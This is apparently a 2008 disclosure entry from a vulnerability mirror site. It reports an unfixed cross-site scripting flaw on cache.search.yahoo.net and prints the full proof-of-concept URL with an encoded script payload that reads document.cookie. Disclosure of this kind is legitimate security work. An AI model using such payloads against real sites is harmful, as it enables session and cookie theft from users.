Security researcher kInGoFcHaOs, has submitted on 31/08/2008 a cross-site-scripting (XSS) vulnerability affecting cache.search.yahoo.net, which at the time of submission ranked 1 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 31/08/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 31/08/2008 |
Date published: 31/08/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: kInGoFcHaOs |
Domain: cache.search.yahoo.net |
Category: XSS |
Pagerank: 1 |
URL: http://cache.search.yahoo.net/search/cache?ei=UTF-8&p=%3C%22%3C%3C%22%3C%3CsCrIPT%3Ealert(document.c ookie)%3C%2FsCrIpT%3E&u=www.last.fm/music/%25253Cscript%25253Ealert%252528document.cookie%252529%252 53B%25253C%25252Fscript%25253E&w=script+alert+document+cookie+script&d=Yn3rShg5RVoN&icp=1&.intl=us |
Click here to view the mirror
|
|
|